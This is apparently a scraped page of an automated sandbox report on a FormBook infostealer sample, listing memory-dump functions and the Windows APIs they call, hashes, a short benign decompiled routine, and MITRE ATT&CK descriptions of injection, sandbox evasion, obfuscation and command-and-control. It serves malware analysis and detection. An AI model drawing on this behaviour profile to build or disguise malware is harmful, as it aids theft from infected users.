Opcode ID: d404328e1fac90a21f31535b6a7c40d3b59b6155e63acaaf00ee8134cb2f1bdd
Instruction ID: 1005f62b04cf3aaa6a9397fcf714a4b7299d8b4653b954a05ec20eb06e4143f9
Opcode Fuzzy Hash: d404328e1fac90a21f31535b6a7c40d3b59b6155e63acaaf00ee8134cb2f1bdd
Instruction Fuzzy Hash: C290026921300006F2A07159540860A000597D5346F91D43DA00065A8CC955D86D7361

Uniqueness

Uniqueness Score: -1.00%

Function 02786EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02786F98

Strings

wininet.dll, xrefs: 02786F4E, 02786F57
net.dll, xrefs: 02786F61, 02786FE7, 02786FBF, 02786FCB, 02786FF3

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
Instruction ID: ca4bdbf8c55b8c7fa753082b1eaf11bdf6f3a2ca22f128b86482331a987ad878
Opcode Fuzzy Hash: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
Instruction Fuzzy Hash: 23318CB5642704BBC712EF68C8A4FA7B7B9AB88700F00841DF61AAB240D730B445CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02786EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02786F98

Strings

wininet.dll, xrefs: 02786F4E, 02786F57
net.dll, xrefs: 02786F61, 02786FBF, 02786FCB

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6b7617ac0ee6e22add5dfebb65a5511c282918e9772ae2f9ecbebc3b78e4506b
Instruction ID: 59659c88866618ad706928c0c07a589cefec32b2b38ceff3229c2de7a0aba5c4
Opcode Fuzzy Hash: 6b7617ac0ee6e22add5dfebb65a5511c282918e9772ae2f9ecbebc3b78e4506b
Instruction Fuzzy Hash: 1E218DB1A41704ABD711EF64C8A5FAAB7B9BF88700F14802DF61AAB241D370A455CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 027884E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02773B93), ref: 0278850D

Strings

.z`, xrefs: 027884FC, 02788508

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e0104f63cae6667895156cbc4f9c342209fe374f0523213a891c3dba84ab28f2
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 29E046B1200208ABDB18EF99CC48EA777ADEF88750F018558FE085B241D630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 027884D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02773B93), ref: 0278850D

Strings

.z`, xrefs: 027884FC, 02788508

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
Instruction ID: dd20f8dc4ce0716b3079777e657b68d686ac5283d339d0907618688f63108e96
Opcode Fuzzy Hash: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
Instruction Fuzzy Hash: 5EE0D8AC2442851BDB04EE69E4908A73795FF853547549949EC9987307D134D8168BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02777270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027772CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027772EB

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction ID: b45a6d86d61576b51f752d1da9d836a783a30ea676c706855e1bfb600daf6a34
Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction Fuzzy Hash: E501A231A80228BBEB25B6948C06FFFB76C9B10F51F150159FF04BA1C0E6D46A068BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02779B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02779BA2

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 561cc76678fa9b0d80cbbd986c88cd97461cfe5dc057d6161735648a6a45743c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 96011EB5E4020DEBDF10EAA4DC45F9EB7799B44308F004195EA1997251F671EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02788675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0277CFB2,0277CFB2,?,00000000,?,?), ref: 02788670

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
Instruction ID: a74ad2a818178fd4a39e763b404a74914bcaee4cfec9a90e91009c300eed0049
Opcode Fuzzy Hash: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
Instruction Fuzzy Hash: 1A01A2B22442486FDB24EF65CC88EEB7B68EF88310F144599F98D57242D930E811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0278854E, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027885A4

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
Instruction ID: 0f0a118db2fa8007b1c15cfafaf73da0e5de73d6e7a493c0b738ff3fa4fc5bd4
Opcode Fuzzy Hash: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
Instruction Fuzzy Hash: 74019DB2210108ABCB54DF89DC84EEB77ADAF8C754F158258FA0D97240D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02788550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027885A4

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: f521bd39e0e40a8e5355e2c7f863b246a06fbc4917b9cd2c2de407f0b841a2dc
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: D401AFB2210108ABCB54DF89DC84EEB77ADAF8C754F158258BA0D97240D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02787020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0277CCE0,?,?), ref: 0278705C

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction ID: 9a7c11396651027107eccfd3abb2d763150e3bce42344e6449f1d7967d95d33d
Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction Fuzzy Hash: 9EE06D733C03043AE23075A9AC02FA7B29D8B85B20F150026FA0DEA2C1D595F80146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02788640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0277CFB2,0277CFB2,?,00000000,?,?), ref: 02788670

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 233f129cece1308508f4a802e78634ade12b22c855121a6099bbe455f97ad690
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 62E01AB12002086BDB10EF49CC84EE737ADAF88650F018154BA0857241D930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 027884A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02783526,?,02783C9F,02783C9F,?,02783526,?,?,?,?,?,00000000,00000000,?), ref: 027884CD

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: fe5d82a796a60a98b8d0a6207e245ce6993d2e4ffc061508974a6d18e38f821e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: A4E046B1200208ABDB14EF99CC44EA777ADEF88750F118558FE085B241C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 02788642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0277CFB2,0277CFB2,?,00000000,?,?), ref: 02788670

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
Instruction ID: ec631a9c5611d9193dfbf4ffe6216c8831f192753ae734024642b2e99e7cf2eb
Opcode Fuzzy Hash: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
Instruction Fuzzy Hash: 3FE04FB12002086FDB10DF55CC84FE73769EF88350F018154F90C97241D531E8118BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0277D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02777C73,?), ref: 0277D44B

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: f0b2064edc2d5a1da5245c361fb4e1e6c3078dc79c6fe04d6fe659809cafe57d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 9DD05E727903042AEA10BAA8DC06F2672895B44A04F494074F948962C3DA54E4004561

Uniqueness

Uniqueness Score: -1.00%

Function 047B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B9694

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7beebc50de4413daa14683c9efa129a8de3f618a28052eeb4e6ca3b400425ab2
Instruction ID: f65e0e02420f05a32197d006dd4c8ec2b71d0776deaaee5169fc8ffff24f9806
Opcode Fuzzy Hash: 7beebc50de4413daa14683c9efa129a8de3f618a28052eeb4e6ca3b400425ab2
Instruction Fuzzy Hash: 9BB09BF19014C5C9F721D760460C717790077D4745F26C076D3520691A4778D095F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0480FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0480FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E047BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04805720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04805720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0480fdda
0x0480fde2
0x0480fde5
0x0480fdec
0x0480fdfa
0x0480fdff
0x0480fe0a
0x0480fe0f
0x0480fe17
0x0480fe1e
0x0480fe19
0x0480fe19
0x0480fe19
0x0480fe20
0x0480fe21
0x0480fe22
0x0480fe25
0x0480fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0480FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0480FE2B

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 2b6013a24939113a9f84e10660b631cca736ce3b118e2c28a28acf2057343fa1
Instruction ID: af2c8a7edee742cbb19128777e0ed0d10c0408d4341bd7134745e4c557d07e29
Opcode Fuzzy Hash: 2b6013a24939113a9f84e10660b631cca736ce3b118e2c28a28acf2057343fa1
Instruction Fuzzy Hash: E0F0FC72600101BFE6601A55DC06F237B5AEB44730F148714F718951D1EAA2F8209AF5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 85vLO1Rpcy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Function 00401000, Relevance: 348.9, APIs: 2, Strings: 197, Instructions: 667
COMMON